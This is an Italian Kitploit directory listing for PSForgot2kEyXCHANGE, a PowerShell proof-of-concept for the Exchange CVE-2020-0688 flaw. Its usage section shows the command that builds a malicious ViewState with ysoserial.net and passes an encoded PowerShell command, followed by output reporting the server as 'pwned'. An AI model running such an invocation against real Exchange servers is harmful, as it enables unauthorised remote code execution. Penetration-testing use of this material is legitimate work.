Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PSForgot2kEyXCHANGE — PoC per Forgot2kEyXCHANGE (CVE-2020-0688) scritto in PowerShell | Kitploit
Strumenti/GitHubGitHub/justin-p/psforgot2keyxchange
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingGenerazione di Shellcode
GitHubjustin-p/psforgot2keyxchange

PSForgot2kEyXCHANGE

PoC per Forgot2kEyXCHANGE (CVE-2020-0688) scritto in PowerShell

Vedi Repository
566 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PSForgot2kEyXCHANGE

PoC per Forgot2kEyXCHANGE (CVE-2020-0688) scritto in PowerShell

Utilizzo

Questo PoC richiede un nome utente e una password validi.

Questo PoC utilizza ysoserial.net per creare il nuovo ViewState che contiene il comando specificato nel parametro -Command. Se non lo hai già installato sul tuo sistema, scaricalo qui.

root@kitploit:~
PS> . .\PSForgot2kEyXCHANGE.ps1
PS> Invoke-Forgot2kEyXCHANG -Server 'https://webmail.domain.tld' -User '[email protected]' -Password 'Summer2020!' -Command 'cmd /c powershell.exe -en dwByAGkAdABlAC0AaABvAHMAdAAgACcASQAnAG0AIABhACAAcwB0AGkAbgBrAHkAIABzAGsAaQBkACAAdwBoAG8AIAByAHUAbgBzACAAcgBhAG4AZABvAG0AIABjAG8AZABlACAAOgApACcA=' -YsoserialPath 'C:\tools\ysoserial.net\ysoserial.exe'
[+] Login successfully!
[+] Generated new ViewState successfully!
[+] Got a 500 response, successfully pwned https://webmail.domain.tld !

Contributi

Sentiti libero di aprire issue, contribuire e inviare le tue Pull Request. Puoi anche contattarmi su Twitter (@JustinPerdok).

Scarica lo strumento